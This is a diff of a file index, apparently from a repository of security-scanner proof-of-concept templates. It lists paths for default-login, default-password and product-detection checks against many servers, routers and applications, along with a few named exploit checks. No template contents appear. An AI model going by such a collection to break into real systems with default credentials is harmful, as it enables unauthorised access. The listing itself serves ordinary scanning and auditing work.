+./poc/default/alphaweb-default-login-275.yaml ./poc/default/alphaweb-default-login-276.yaml ./poc/default/alphaweb-default-login-277.yaml ./poc/default/ambari-default-credentials-286.yaml ./poc/default/ambari-default-credentials.yaml +./poc/default/ambari-default-login-287.yaml ./poc/default/ambari-default-login-288.yaml ./poc/default/ambari-default-login-289.yaml ./poc/default/ambari-default-login-290.yaml @@ -42391,6 +42428,7 @@ ./poc/default/aolynk-br304-default-passwordl.yaml ./poc/default/apache-ambari-default-password.yml ./poc/default/apisix-default-login-490.yaml +./poc/default/apisix-default-login-491.yaml ./poc/default/apisix-default-login-492.yaml ./poc/default/apollo-default-login-520.yaml ./poc/default/arl-default-login-537.yaml @@ -42408,16 +42446,15 @@ ./poc/default/azkaban-default-login-671.yaml ./poc/default/azkaban-default-login-672.yaml ./poc/default/azkaban-default-login-673.yaml +./poc/default/azkaban-default-login-674.yaml ./poc/default/azkaban-default-login-675.yaml -./poc/default/azkaban-default-login.yaml ./poc/default/azkaban-default-password.yaml ./poc/default/azkaban-web-client-default-creds.yaml ./poc/default/azure-default-page.yaml ./poc/default/bithighway-default-password.yaml +./poc/default/businessintelligence-default-login-814.yaml ./poc/default/businessintelligence-default-login-815.yaml ./poc/default/businessintelligence-default-login-816.yaml -./poc/default/businessintelligence-default-login-817.yaml -./poc/default/businessintelligence-default-login.yaml ./poc/default/canal-default-login-847.yaml ./poc/default/canal-default-login-848.yaml ./poc/default/canal-default-login-849.yaml @@ -42427,6 +42464,7 @@ ./poc/default/chinaunicom-default-login-906.yaml ./poc/default/chinaunicom-default-login-907.yaml ./poc/default/chinaunicom-default-login-908.yaml +./poc/default/chinaunicom-default-login-909.yaml ./poc/default/chinaunicom-modem-default-credentials-911.yaml ./poc/default/chinaunicom-modem-default-credentials.yaml ./poc/default/chinaunicom-modem-default-password.yaml @@ -42437,11 +42475,12 @@ ./poc/default/cobbler-default-login-1118.yaml ./poc/default/cobbler-default-login-1119.yaml ./poc/default/cobbler-default-login-1120.yaml +./poc/default/cobbler-default-login.yaml ./poc/default/control4-default-login.yaml ./poc/default/corero-cms-default-login.yaml ./poc/default/corero-swa-default-login.yaml ./poc/default/cs141-default-login-1.yaml -./poc/default/cs141-default-login-1277.yaml +./poc/default/cs141-default-login-1278.yaml ./poc/default/cs141-default-login-1279.yaml ./poc/default/cs141-default-login-1280.yaml ./poc/default/cs141-default-login-2.yaml @@ -42452,12 +42491,14 @@ ./poc/default/datang-ac-default-password-cnvd-2021-04128.yml ./poc/default/datang-ac-default-password.yaml ./poc/default/default-apache-test-all-6812.yaml +./poc/default/default-apache-test-all-6813.yaml ./poc/default/default-apache-test-all-6814.yaml -./poc/default/default-apache-test-all-6815.yaml +./poc/default/default-apache-test-all.yaml ./poc/default/default-apache-test-page-6816.yaml ./poc/default/default-apache-test-page-6817.yaml ./poc/default/default-apache-test-page-6818.yaml ./poc/default/default-apache-test-page-6819.yaml +./poc/default/default-apache-test-page.yaml ./poc/default/default-apache2-page-6804.yaml ./poc/default/default-apache2-page-6805.yaml ./poc/default/default-apache2-page-6806.yaml @@ -42466,6 +42507,7 @@ ./poc/default/default-apache2-ubuntu-page-6809.yaml ./poc/default/default-apache2-ubuntu-page-6810.yaml ./poc/default/default-apache2-ubuntu-page-6811.yaml +./poc/default/default-apache2-ubuntu-page.yaml ./poc/default/default-asp-6823.yaml ./poc/default/default-asp-net-page-6820.yaml ./poc/default/default-asp-net-page-6822.yaml @@ -42476,36 +42518,33 @@ ./poc/default/default-centos-test-page-6827.yaml ./poc/default/default-centos-test-page-6828.yaml ./poc/default/default-centos-test-page-6829.yaml -./poc/default/default-centos-test-page.yaml ./poc/default/default-codeigniter-page-6830.yaml ./poc/default/default-codeigniter-page-6831.yaml ./poc/default/default-codeigniter-page-6832.yaml -./poc/default/default-codeigniter-page-6833.yaml ./poc/default/default-codeigniter-page-6834.yaml ./poc/default/default-config-6835.yaml ./poc/default/default-config.yaml ./poc/default/default-detect-generic-6837.yaml ./poc/default/default-detect-generic-6838.yaml -./poc/default/default-django-page-6840.yaml ./poc/default/default-django-page-6841.yaml ./poc/default/default-django-page-6842.yaml ./poc/default/default-django-page-6843.yaml +./poc/default/default-django-page.yaml ./poc/default/default-fastcgi-page-6844.yaml ./poc/default/default-fastcgi-page-6845.yaml ./poc/default/default-fastcgi-page-6846.yaml ./poc/default/default-fastcgi-page-6847.yaml +./poc/default/default-fastcgi-page.yaml +./poc/default/default-fedora-page-6848.yaml ./poc/default/default-fedora-page-6849.yaml ./poc/default/default-fedora-page-6850.yaml ./poc/default/default-fedora-page-6851.yaml -./poc/default/default-fedora-page.yaml -./poc/default/default-glassfish-server-page-6852.yaml ./poc/default/default-glassfish-server-page-6853.yaml ./poc/default/default-glassfish-server-page-6854.yaml ./poc/default/default-glassfish-server-page-6855.yaml ./poc/default/default-glassfish-server-page.yaml ./poc/default/default-ibm-http-server-6856.yaml ./poc/default/default-ibm-http-server.yaml -./poc/default/default-iis7-page-6858.yaml ./poc/default/default-iis7-page-6859.yaml ./poc/default/default-iis7-page-6860.yaml ./poc/default/default-iis7-page-6861.yaml @@ -42517,6 +42556,8 @@ ./poc/default/default-lighttpd-page-6867.yaml ./poc/default/default-lucee-page-6868.yaml ./poc/default/default-lucee-page-6869.yaml +./poc/default/default-lucee-page-6870.yaml +./poc/default/default-lucee-page-6871.yaml ./poc/default/default-lucee-page-6872.yaml ./poc/default/default-mag-42c8a5445d70abc166f93c14f3500712.yaml ./poc/default/default-mag.yaml @@ -42525,10 +42566,10 @@ ./poc/default/default-microsoft-azure-page-6874.yaml ./poc/default/default-microsoft-azure-page-6875.yaml ./poc/default/default-microsoft-azure-page-6876.yaml -./poc/default/default-microsoft-azure-page.yaml ./poc/default/default-movable-page-6877.yaml ./poc/default/default-movable-page-6878.yaml ./poc/default/default-movable-page-6879.yaml +./poc/default/default-nginx-page-6880.yaml ./poc/default/default-nginx-page-6881.yaml ./poc/default/default-nginx-page-6882.yaml ./poc/default/default-nginx-page-6883.yaml @@ -42542,22 +42583,22 @@ ./poc/default/default-oracle-application-page-6891.yaml ./poc/default/default-oracle-application-page-6892.yaml ./poc/default/default-oracle-application-page-6893.yaml -./poc/default/default-oracle-application-page.yaml +./poc/default/default-payara-server-page-6894.yaml ./poc/default/default-payara-server-page-6895.yaml ./poc/default/default-payara-server-page-6896.yaml ./poc/default/default-payara-server-page-6897.yaml -./poc/default/default-payara-server-page.yaml ./poc/default/default-plesk-page-6898.yaml -./poc/default/default-plesk-page-6899.yaml ./poc/default/default-plesk-page-6900.yaml ./poc/default/default-plesk-page-6901.yaml ./poc/default/default-redhat-test-page-6902.yaml ./poc/default/default-redhat-test-page-6903.yaml ./poc/default/default-redhat-test-page-6904.yaml ./poc/default/default-redhat-test-page-6905.yaml +./poc/default/default-redhat-test-page.yaml ./poc/default/default-sitecore-page.yaml ./poc/default/default-ssltls-test-page-6906.yaml ./poc/default/default-ssltls-test-page-6907.yaml +./poc/default/default-ssltls-test-page-6908.yaml ./poc/default/default-ssltls-test-page-6909.yaml ./poc/default/default-tomcat-page-6911.yaml ./poc/default/default-tomcat-page.yaml @@ -42565,6 +42606,7 @@ ./poc/default/default-windows-server-page-6913.yaml ./poc/default/default-windows-server-page-6914.yaml ./poc/default/default-windows-server-page-6915.yaml +./poc/default/default-windows-server-page.yaml ./poc/default/default.yaml ./poc/default/dell-emc-ecom-default-credentials-6917.yaml ./poc/default/dell-emc-ecom-default-credentials.yaml @@ -42572,10 +42614,8 @@ ./poc/default/dell-idrac-default-login-6943.yaml ./poc/default/dell-idrac-default-login-6944.yaml ./poc/default/dell-idrac-default-login-6945.yaml -./poc/default/dell-idrac-default-login-6946.yaml ./poc/default/dell-idrac9-default-login-6930.yaml ./poc/default/dell-idrac9-default-login-6931.yaml -./poc/default/dell-idrac9-default-login-6932.yaml ./poc/default/dell-idrac9-default-login-6933.yaml ./poc/default/dell-idrac9-default-login-6934.yaml ./poc/default/dell-idrac9-default-login-6935.yaml @@ -42586,7 +42626,6 @@ ./poc/default/dlink-ac-default-password.yaml ./poc/default/dlink-default-password.yaml ./poc/default/dolphinscheduler-default-login-7072.yaml -./poc/default/dolphinscheduler-default-login-7073.yaml ./poc/default/druid-default-login-1.yaml ./poc/default/druid-default-login-2.yaml ./poc/default/druid-default-login-7095.yaml @@ -42595,8 +42634,8 @@ ./poc/default/druid-default-login.yaml ./poc/default/druid-default-password-1.yaml ./poc/default/druid-default-password-2.yaml +./poc/default/dubbo-admin-default-login-7120.yaml ./poc/default/dubbo-admin-default-login-7121.yaml -./poc/default/dubbo-admin-default-login.yaml ./poc/default/dubbo-admin-default-password.yaml ./poc/default/dubbo-admin-default-password.yml ./poc/default/dvwa-default-login-7126.yaml @@ -42614,6 +42653,7 @@ ./poc/default/exacqvision-default-login-7274.yaml ./poc/default/exacqvision-default-login-7275.yaml ./poc/default/exacqvision-default-login-7276.yaml +./poc/default/exacqvision-default-login-7277.yaml ./poc/default/exacqvision-default-password.yaml ./poc/default/flir-ax8-default-credentials-7512.yaml ./poc/default/flir-ax8-default-credentials.yaml @@ -42621,17 +42661,18 @@ ./poc/default/flir-default-login-7514.yaml ./poc/default/flir-default-login-7515.yaml ./poc/default/flir-default-login-7516.yaml +./poc/default/flir-default-login.yaml ./poc/default/frp-default-credentials-7555.yaml ./poc/default/frp-default-credentials.yaml ./poc/default/frp-default-login-7556.yaml ./poc/default/frp-default-login-7557.yaml ./poc/default/frp-default-login-7558.yaml -./poc/default/frp-default-login.yaml +./poc/default/frp-default-login-7559.yaml ./poc/default/ftp-default-credentials.yaml -./poc/default/ftp-default-creds.yaml -./poc/default/fuelcms-default-login-7572.yaml -./poc/default/fuelcms-default-login.yaml +./poc/default/fuelcms-default-login-7571.yaml ./poc/default/geoserver-default-login-7593.yaml +./poc/default/geoserver-default-login-7594.yaml +./poc/default/geoserver-default-login.yaml ./poc/default/glpi-default-credential.yaml ./poc/default/glpi-default-login-7731.yaml ./poc/default/glpi-default-login-7732.yaml @@ -42640,7 +42681,6 @@ ./poc/default/gophish-default-login-7792.yaml ./poc/default/gophish-default-login-7793.yaml ./poc/default/gophish-default-login-7794.yaml -./poc/default/gophish-default-login.yaml ./poc/default/grafana-default-credential-1.yaml ./poc/default/grafana-default-credential-2.yaml ./poc/default/grafana-default-credential.yaml @@ -42650,11 +42690,11 @@ ./poc/default/grafana-default-login-7801.yaml ./poc/default/grafana-default-login-7802.yaml ./poc/default/grafana-default-login-7803.yaml +./poc/default/grafana-default-login-7804.yaml ./poc/default/grafana-default-password.yaml ./poc/default/grafana-default-password.yml ./poc/default/graphite-browser-default-credential.yaml ./poc/default/guacamole-default-login-7858.yaml -./poc/default/guacamole-default-login-7859.yaml ./poc/default/guacamole-default-login-7860.yaml ./poc/default/guacamole-default-login-7861.yaml ./poc/default/hikvision-intercom-service-default-password.yaml @@ -42670,19 +42710,17 @@ ./poc/default/hp-switch-default-login-8035.yaml ./poc/default/hp-switch-default-login-8037.yaml ./poc/default/hp-switch-default-login-8038.yaml -./poc/default/hp-switch-default-login.yaml ./poc/default/huawei-HG532e-default-login.yaml ./poc/default/huawei-HG532e-default-router-login.yaml ./poc/default/huawei-hg532e-default-router-login-8062.yaml ./poc/default/huawei-hg532e-default-router-login-8063.yaml -./poc/default/huawei-hg532e-default-router-login-8064.yaml ./poc/default/hue-default-credential-8080.yaml ./poc/default/hue-default-credential-8081.yaml ./poc/default/ibm-dcbc-default-login.yaml ./poc/default/ibm-dcec-default-login.yaml ./poc/default/ibm-dsc-default-login.yaml ./poc/default/ibm-hmc-default-login.yaml -./poc/default/ibm-mqseries-default-login-8107.yaml +./poc/default/ibm-mqseries-default-login-8106.yaml ./poc/default/ibm-mqseries-default-login-8108.yaml ./poc/default/ibm-storage-default-credential-8123.yaml ./poc/default/ibm-storage-default-credential-8124.yaml @@ -42696,12 +42734,11 @@ ./poc/default/iis-default-page.yaml ./poc/default/imm-default-login.yaml ./poc/default/inspur-clusterengine-default-login-8162.yaml +./poc/default/inspur-clusterengine-default-login.yaml ./poc/default/iptime-default-login-8192.yaml -./poc/default/iptime-default-login-8193.yaml ./poc/default/iptime-default-login-8194.yaml ./poc/default/jboss-default-password.yaml ./poc/default/jenkins-default-8270.yaml -./poc/default/jenkins-default-8271.yaml ./poc/default/jenkins-default-8272.yaml ./poc/default/jenkins-default-8273.yaml ./poc/default/jenkins-default-login.yaml @@ -42709,21 +42746,20 @@ ./poc/default/jinher-oa-c6-default-password.yaml ./poc/default/jinher-oa-c6-default-password.yml ./poc/default/jinher-oa-default-login-8311.yaml -./poc/default/jinher-oa-default-login-8312.yaml ./poc/default/jira-login-default.yaml ./poc/default/jmx-default-login-8354.yaml -./poc/default/jmx-default-login-8355.yaml ./poc/default/jmx-default-login-8356.yaml +./poc/default/jmx-default-login.yaml ./poc/default/jmx-default-password.yaml ./poc/default/jupyterhub-default-login-8399.yaml ./poc/default/jupyterhub-default-login-8400.yaml ./poc/default/kafka-center-default-login-8415.yaml +./poc/default/kafka-center-default-login-8416.yaml ./poc/default/kafka-center-default-login-8417.yaml ./poc/default/kafka-center-default-password.yaml ./poc/default/kingsoft-v8-default-password.yaml ./poc/default/kingsoft-v8-default-password.yml ./poc/default/konga-default-jwt-key.yaml -./poc/default/lighttpd-default-8627.yaml ./poc/default/lighttpd-default-8628.yaml ./poc/default/lighttpd-default.yaml ./poc/default/lutron-iot-default-login-8674.yaml @@ -42732,14 +42768,12 @@ ./poc/default/lutron-iot-default-login-8678.yaml ./poc/default/lutron-iot-default-login.yaml ./poc/default/mantisbt-default-credential-8778.yaml -./poc/default/mantisbt-default-credential-8779.yaml ./poc/default/micro-focus-ucmdb-default-credentials-8843.yaml ./poc/default/micro-focus-ucmdb-default-credentials.yaml ./poc/default/minio-default-login(1).yaml ./poc/default/minio-default-login-1.yaml ./poc/default/minio-default-login-2.yaml ./poc/default/minio-default-login-8887.yaml -./poc/default/minio-default-login-8888.yaml ./poc/default/minio-default-login-8889.yaml ./poc/default/minio-default-password-1.yaml ./poc/default/minio-default-password-2.yaml @@ -42755,10 +42789,10 @@ ./poc/default/nagios-default-credential-8989.yaml ./poc/default/nagios-default-credential.yaml ./poc/default/nagios-default-login-8990.yaml -./poc/default/nagios-default-login-8991.yaml ./poc/default/nagios-default-login-8992.yaml ./poc/default/nagios-default-login-8993.yaml ./poc/default/nagios-default-login-8994.yaml +./poc/default/nagios-default-login.yaml ./poc/default/netentsec-icg-default-password.yaml ./poc/default/netentsec-icg-default-password.yml ./poc/default/netsus-default-login-9058.yaml @@ -42780,7 +42814,8 @@ ./poc/default/ns-icg-default-password.yaml ./poc/default/nsicg-default-password.yaml ./poc/default/o2-default-password.yaml -./poc/default/octobercms-default-login-9193.yaml +./poc/default/octobercms-default-login-9192.yaml +./poc/default/octobercms-default-login.yaml ./poc/default/ofbiz-default-credentials-9207.yaml ./poc/default/ofbiz-default-credentials.yaml ./poc/default/ofbiz-default-login-9208.yaml @@ -42794,21 +42829,20 @@ ./poc/default/openwrt-default-login-9332.yaml ./poc/default/openwrt-default-login.yaml ./poc/default/operations-automation-default-page-9336.yaml -./poc/default/operations-automation-default-page-9337.yaml ./poc/default/operations-automation-default-page-9338.yaml ./poc/default/operations-automation-default-page-9339.yaml ./poc/default/operations-automation-default-page-9340.yaml ./poc/default/oracle-bi-default-credentials.yaml ./poc/default/panabit-default-login-9437.yaml +./poc/default/panabit-default-login-9438.yaml ./poc/default/panabit-default-login-9439.yaml -./poc/default/panabit-default-login-9440.yaml +./poc/default/panabit-default-login.yaml ./poc/default/panabit-default-password-9441.yaml ./poc/default/panabit-default-password-9442.yaml ./poc/default/panabit-default-password.yaml ./poc/default/panabit-gateway-default-password.yaml ./poc/default/panabit-gateway-default-password.yml ./poc/default/panabit-ixcache-default-login-9443.yaml -./poc/default/panabit-ixcache-default-login.yaml ./poc/default/panabit-ixcache-default-password.yaml ./poc/default/panabit-ixcache-default-password.yml ./poc/default/panos-default-credentials.yaml @@ -42819,7 +42853,6 @@ ./poc/default/pentaho-default-login-9478.yaml ./poc/default/pentaho-default-login-9479.yaml ./poc/default/pentaho-default-login-9480.yaml -./poc/default/pentaho-default-login.yaml ./poc/default/peoplesoft-default-login.yaml ./poc/default/phpmyadmin-default-login-extended.yaml ./poc/default/phpmyadmin-default-page.yaml @@ -42831,20 +42864,16 @@ ./poc/default/rabbitmq-default-login-9783.yaml ./poc/default/rabbitmq-default-login-9784.yaml ./poc/default/rabbitmq-default-login-9785.yaml -./poc/default/rabbitmq-default-login-9786.yaml -./poc/default/rabbitmq-default-login.yaml ./poc/default/rabbitmq-default-password.yaml ./poc/default/rabbitmq-default-password.yml ./poc/default/rainloop-default-login-9811.yaml ./poc/default/rainloop-default-login-9812.yaml -./poc/default/rainloop-default-login-9813.yaml ./poc/default/rainloop-default-login.yaml ./poc/default/rancher-default-login-9814.yaml -./poc/default/rancher-default-login-9815.yaml ./poc/default/rancher-default-login-9816.yaml +./poc/default/rancher-default-login.yaml ./poc/default/rancher-default-password.yaml -./poc/default/ranger-default-login-9827.yaml -./poc/default/ranger-default-login-9828.yaml +./poc/default/ranger-default-login.yaml ./poc/default/redfish-bmc-default-login.yaml ./poc/default/redis-default-logins.yaml ./poc/default/rockmongo-default-credentials-9896.yaml @@ -42853,9 +42882,9 @@ ./poc/default/rockmongo-default-login-9898.yaml ./poc/default/rockmongo-default-login-9899.yaml ./poc/default/rockmongo-default-login-9900.yaml -./poc/default/rockmongo-default-login.yaml ./poc/default/rockmongo-default-password.yaml ./poc/default/rockmongo-default-password.yml +./poc/default/rseenet-default-login-9913.yaml ./poc/default/rseenet-default-login-9914.yaml ./poc/default/rseenet-default-login-9915.yaml ./poc/default/rseenet-default-password.yaml @@ -42869,6 +42898,7 @@ ./poc/default/samsung-wlan-default-login-10017.yaml ./poc/default/samsung-wlan-default-login-10018.yaml ./poc/default/secnet-ac-default-login-10113.yaml +./poc/default/secnet-ac-default-login.yaml ./poc/default/secnet-ac-default-password.yaml ./poc/default/secnet-ac-default-password.yml ./poc/default/seeddms-default-login-10125.yaml @@ -42879,7 +42909,7 @@ ./poc/default/seeyon-a8-management-monitor-default-password.yaml ./poc/default/seeyon-oa-a8-management-default-password.yaml ./poc/default/sequoiadb-default-login-10150.yaml -./poc/default/sequoiadb-default-login-10151.yaml +./poc/default/sequoiadb-default-login-10152.yaml ./poc/default/showdoc-default-login-10219.yaml ./poc/default/showdoc-default-login-10220.yaml ./poc/default/showdoc-default-login-10221.yaml @@ -42896,6 +42926,7 @@ ./poc/default/solarwinds-default-admin-2.yaml ./poc/default/solarwinds-default-admin.yaml ./poc/default/solarwinds-default-login-1.yaml +./poc/default/solarwinds-default-login-10354.yaml ./poc/default/solarwinds-default-login-10355.yaml ./poc/default/solarwinds-default-login-10356.yaml ./poc/default/solarwinds-default-login-2.yaml @@ -42907,20 +42938,21 @@ ./poc/default/spectracom-default-password.yaml ./poc/default/ssh-default-logins.yaml ./poc/default/stackstorm-default-login-10529.yaml +./poc/default/stackstorm-default-login-10530.yaml ./poc/default/stackstorm-default-login.yaml ./poc/default/supermicro-default-login-10572.yaml -./poc/default/supermicro-default-login.yaml ./poc/default/superset-default-login-10573.yaml ./poc/default/superset-default-login-10574.yaml ./poc/default/superset-default-login.yaml ./poc/default/szhe-default-login-10635.yaml ./poc/default/szhe-default-login-10636.yaml ./poc/default/szhe-default-login-10637.yaml -./poc/default/szhe-default-login-10638.yaml +./poc/default/szhe-default-login.yaml ./poc/default/szhe-default-password-10639.yaml ./poc/default/szhe-default-password-10640.yaml ./poc/default/szhe-default-password.yaml ./poc/default/telecom-gateway-default-login-10686.yaml +./poc/default/telecom-gateway-default-login.yaml ./poc/default/telecom-gateway-default-password.yaml ./poc/default/telecom-gateway-default-password.yml ./poc/default/tingsboard-default-login.yaml @@ -42957,20 +42989,20 @@ ./poc/default/ucmdb-default-login-10868.yaml ./poc/default/ucmdb-default-login-10869.yaml ./poc/default/ucmdb-default-login-10870.yaml -./poc/default/ucmdb-default-login.yaml +./poc/default/ucmdb-default-login-10871.yaml ./poc/default/utt-default-password.yaml ./poc/default/versa-default-login-11002.yaml ./poc/default/versa-default-login-11003.yaml ./poc/default/versa-default-login-11004.yaml -./poc/default/versa-default-login.yaml ./poc/default/versa-default-password.yaml ./poc/default/versa-flexvnf-ui-default-login.yaml ./poc/default/vidyo-default-login-11008.yaml ./poc/default/vidyo-default-login-11010.yaml ./poc/default/visionhub-default-credentials.yaml +./poc/default/visionhub-default-login-11026.yaml ./poc/default/visionhub-default-login-11027.yaml ./poc/default/visionhub-default-login-11028.yaml -./poc/default/visionhub-default-login-11029.yaml +./poc/default/visionhub-default-login.yaml ./poc/default/wanhu-ezoffice-defaultroot-evointerfaceservlet-infoleak.yaml ./poc/default/wanhu-ezoffice-defaultroot-officeserverservlet-fileupload.yaml ./poc/default/wanhuOA-default-login.yaml @@ -42978,9 +43010,11 @@ ./poc/default/wayos-default-password.yaml ./poc/default/wazuh-default-login.yaml ./poc/default/webmethod-integration-default-login.yaml +./poc/default/wifisky-default-login-11201.yaml ./poc/default/wifisky-default-login-11202.yaml ./poc/default/wifisky-default-login-11203.yaml ./poc/default/wifisky-default-login-11204.yaml +./poc/default/wifisky-default-login.yaml ./poc/default/wifisky-default-password-11205.yaml ./poc/default/wifisky-default-password-11206.yaml ./poc/default/wifisky-default-password-cnvd-2021-39012.yml @@ -42988,15 +43022,13 @@ ./poc/default/wp-default-feature-image-77ca0fafb755e10a5f728cc189fc877a.yaml ./poc/default/wp-default-feature-image.yaml ./poc/default/wso2-default-login-11640.yaml -./poc/default/wso2-default-login-11641.yaml ./poc/default/wso2-default-login-11642.yaml ./poc/default/wso2-default-login-11643.yaml +./poc/default/wso2-default-login.yaml ./poc/default/wso2-default-password.yaml ./poc/default/xampp-default-page-11660.yaml ./poc/default/xampp-default-page-11661.yaml ./poc/default/xampp-default-page-11662.yaml -./poc/default/xampp-default-page-11663.yaml -./poc/default/xampp-default-page.yaml ./poc/default/xerox-workcentre7-default-password.yaml ./poc/default/xerox7-default-login-11678.yaml ./poc/default/xerox7-default-login-11679.yaml @@ -43013,15 +43045,15 @@ ./poc/default/zabbix-default-credentials.yaml ./poc/default/zabbix-default-login-11760.yaml ./poc/default/zabbix-default-login-11761.yaml -./poc/default/zabbix-default-login-11762.yaml +./poc/default/zabbix-default-login-11763.yaml ./poc/default/zabbix-default-login.yaml ./poc/default/zabbix-default-password.yaml ./poc/default/zabbix-default-password.yml ./poc/default/zmanda-default-credential.yaml ./poc/default/zmanda-default-login-11825.yaml +./poc/default/zmanda-default-login-11826.yaml ./poc/default/zmanda-default-login-11827.yaml ./poc/default/zmanda-default-login-11828.yaml -./poc/default/zmanda-default-login.yaml ./poc/detect/4D-detect.yaml ./poc/detect/AWS-S3-Bucket-Detect.yaml ./poc/detect/Biometric-detect.yaml @@ -43029,14 +43061,15 @@ ./poc/detect/Tomcat-Path-normalize-detect.yaml ./poc/detect/achecker-detect.yaml ./poc/detect/acontent-detect-31.yaml -./poc/detect/acontent-detect.yaml +./poc/detect/acontent-detect-32.yaml +./poc/detect/acontent-detect-33.yaml ./poc/detect/activemq-openwire-transport-detect.yaml ./poc/detect/ad-blocking-detector-29a2fe62a95c9b7d06f91cd4f479a678.yaml ./poc/detect/ad-blocking-detector.yaml ./poc/detect/adbhoney-detection-cnxn.yaml ./poc/detect/adbhoney-detection-shell.yaml ./poc/detect/addeventlistener-detect-64.yaml -./poc/detect/addeventlistener-detect-66.yaml +./poc/detect/addeventlistener-detect-65.yaml ./poc/detect/addeventlistener-detect.yaml ./poc/detect/adminer-panel-detect.yaml ./poc/detect/admiralcloud-detect.yaml @@ -43046,9 +43079,9 @@ ./poc/detect/adobe-coldfusion-detect-4.yaml ./poc/detect/adobe-coldfusion-detect-5.yaml ./poc/detect/adobe-coldfusion-detect-6.yaml -./poc/detect/adobe-coldfusion-detect-82.yaml ./poc/detect/adobe-coldfusion-detect-83.yaml ./poc/detect/adobe-coldfusion-detect-84.yaml +./poc/detect/adobe-coldfusion-detect.yaml ./poc/detect/adobe-coldfusion-detector-1.yaml ./poc/detect/adobe-coldfusion-detector-2.yaml ./poc/detect/adobe-coldfusion-detector-3.yaml @@ -43059,17 +43092,18 @@ ./poc/detect/adobe-coldfusion-error-detect-85.yaml ./poc/detect/adobe-coldfusion-error-detect-86.yaml ./poc/detect/adobe-coldfusion-error-detect-87.yaml -./poc/detect/adobe-coldfusion-error-detect.yaml +./poc/detect/adobe-coldfusion-error-detect-88.yaml ./poc/detect/adselfservice-version-detect.yaml ./poc/detect/aem-detection-143.yaml -./poc/detect/aem-detection-145.yaml +./poc/detect/aem-detection-144.yaml ./poc/detect/aem-detection-146.yaml ./poc/detect/aem-detection.yaml ./poc/detect/airflow-detect-237.yaml ./poc/detect/airflow-detect-238.yaml -./poc/detect/airflow-detect-240.yaml -./poc/detect/alfresco-detect-258.yaml +./poc/detect/airflow-detect-239.yaml +./poc/detect/airflow-detect.yaml ./poc/detect/alfresco-detect-259.yaml +./poc/detect/alfresco-detect-260.yaml ./poc/detect/alfresco-detect.yaml ./poc/detect/amazon-mws-auth-token-detect.yaml ./poc/detect/amazon-sns-topic-disclosure-detect.yaml @@ -43083,14 +43117,15 @@ ./poc/detect/apache-detect-345.yaml ./poc/detect/apache-detect-346.yaml ./poc/detect/apache-detect-347.yaml -./poc/detect/apache-detect-348.yaml ./poc/detect/apache-detect-349.yaml ./poc/detect/apache-druid-detect.yaml ./poc/detect/apache-dubbo-detect-351.yaml -./poc/detect/apollo-server-detect-522.yaml +./poc/detect/apollo-server-detect-523.yaml +./poc/detect/apollo-server-detect.yaml ./poc/detect/aptus-detect.yaml ./poc/detect/argocd-detect.yaml ./poc/detect/arris-modem-detect.yaml +./poc/detect/artica-web-proxy-detect-543.yaml ./poc/detect/artica-web-proxy-detect-544.yaml ./poc/detect/artica-web-proxy-detect-545.yaml ./poc/detect/artica-web-proxy-detect-546.yaml @@ -43101,9 +43136,9 @@ ./poc/detect/audiocodes-detect.yaml ./poc/detect/autobahn-python-detect-592.yaml ./poc/detect/autobahn-python-detect-593.yaml +./poc/detect/autobahn-python-detect-594.yaml ./poc/detect/autobahn-python-detect-595.yaml ./poc/detect/autoset-detect.yaml -./poc/detect/avantfax-detect-598.yaml ./poc/detect/avantfax-detect-599.yaml ./poc/detect/avantfax-detect-600.yaml ./poc/detect/avantfax-detect.yaml @@ -43118,7 +43153,6 @@ ./poc/detect/axigen-mail-server-detect.yaml ./poc/detect/axis-detect.yaml ./poc/detect/axis2-detect.yaml -./poc/detect/azure-takeover-detection-681.yaml ./poc/detect/azure-takeover-detection-682.yaml ./poc/detect/azure-takeover-detection-683.yaml ./poc/detect/azure-takeover-detection.yaml @@ -43127,16 +43161,17 @@ ./poc/detect/basic-auth-detection-688.yaml ./poc/detect/basic-auth-detection-691.yaml ./poc/detect/basic-auth-detection.yaml -./poc/detect/bedita-detect-704.yaml ./poc/detect/bedita-detect-705.yaml ./poc/detect/bedita-detect.yaml ./poc/detect/bgp-detect.yaml ./poc/detect/bigbluebutton-detect-722.yaml -./poc/detect/bigbluebutton-detect.yaml +./poc/detect/bigbluebutton-detect-723.yaml ./poc/detect/bigip-config-utility-detect-1.yaml ./poc/detect/bigip-config-utility-detect-2.yaml ./poc/detect/bigip-config-utility-detect-3.yaml ./poc/detect/bigip-config-utility-detect-730.yaml +./poc/detect/bigip-config-utility-detect-731.yaml +./poc/detect/bigip-config-utility-detect-733.yaml ./poc/detect/bigip-config-utility-detect.yaml ./poc/detect/bigip-detection-734.yaml ./poc/detect/bigip-detection.yaml @@ -43152,12 +43187,11 @@ ./poc/detect/bookstack-detect.yaml ./poc/detect/brother-printer-detect-787.yaml ./poc/detect/brother-printer-detect-789.yaml -./poc/detect/brother-printer-detect-790.yaml ./poc/detect/brother-printer-detect.yaml ./poc/detect/burp-api-detect-809.yaml +./poc/detect/burp-api-detect-810.yaml ./poc/detect/burp-api-detect-812.yaml ./poc/detect/burp-api-detect-813.yaml -./poc/detect/burp-api-detect.yaml ./poc/detect/cacti-detect-1.yaml ./poc/detect/cacti-detect-2.yaml ./poc/detect/cacti-detect-826.yaml @@ -43166,16 +43200,14 @@ ./poc/detect/carestream-vue-detect-2.yaml ./poc/detect/carestream-vue-detect-859.yaml ./poc/detect/carestream-vue-detect-860.yaml -./poc/detect/carestream-vue-detect-861.yaml ./poc/detect/ccm-detect.yaml ./poc/detect/centreon-detect-875.yaml ./poc/detect/centreon-detect-876.yaml -./poc/detect/centreon-detect-877.yaml ./poc/detect/centreon-detect.yaml ./poc/detect/changedetection-panel.yaml ./poc/detect/chatgpt-next-detection.yaml ./poc/detect/chevereto-detect-904.yaml -./poc/detect/chevereto-detect-905.yaml +./poc/detect/chevereto-detect.yaml ./poc/detect/chp-ads-block-detector-17650862b73dff4b34a6315938f6b250.yaml ./poc/detect/chp-ads-block-detector-b7efff873ee4bed005e48f45da9d3636.yaml ./poc/detect/chp-ads-block-detector-dba98e5ea73e2f1d6a07c9c27a108767.yaml @@ -43188,11 +43220,9 @@ ./poc/detect/citrix-adc-gateway-detect-1.yaml ./poc/detect/citrix-adc-gateway-detect-2.yaml ./poc/detect/citrix-adc-gateway-detect-982.yaml -./poc/detect/citrix-adc-gateway-detect-983.yaml ./poc/detect/citrix-adc-gateway-detect.yaml ./poc/detect/citrix-honeypot-detection.yaml ./poc/detect/citrix-netscaler-gateway-detect.yml -./poc/detect/citrix-vpn-detect-984.yaml ./poc/detect/citrix-vpn-detect-985.yaml ./poc/detect/citrix-vpn-detect-986.yaml ./poc/detect/citrix-vpn-detect-987.yaml @@ -43207,7 